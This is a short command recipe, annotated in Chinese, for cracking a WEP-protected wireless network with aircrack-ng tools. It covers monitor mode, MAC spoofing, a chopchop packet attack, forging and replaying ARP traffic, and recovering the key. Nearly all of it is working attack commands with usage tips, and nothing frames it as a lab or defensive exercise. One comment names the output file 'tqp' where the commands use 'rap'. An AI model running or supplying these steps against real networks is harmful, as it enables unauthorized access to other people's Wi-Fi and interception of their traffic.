airmon-ng start eth1(电脑不同,接口有可能未eth0,下同) modprobe ipw2200 rtap-iface=1 iwconfig eth1 key s:fakekey iwconfig eth1 mode managed ifconfig eth1 up hw ether 00:11:22:33:44:55 airodump-ng --ivs -w 1 -c 6 eth1 aireplay-ng -4 -e AP的essid -a AP的mac -h 001122334455 -i rtap0 eth1 packetforge-ng -0 -a AP的mac -h 001122334455 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-*.xor -w rap 其中,replay_dec-*.xor为你得到的xor文件的全称,可用ls命令查看,然后拷贝、粘贴过来,-w后面跟的tqp是文件名,可以随便选取。 aireplay-ng -2 -r rap eth1 (这个命令里的rap必须和上条命令里的rap一样) aircrack-ng -n 64 *.ivs (*.ivs可以通过ls命令查看,也可以直接输入*.ivs,此时,程序将分析你root文件夹里存储的所有ivs文件) |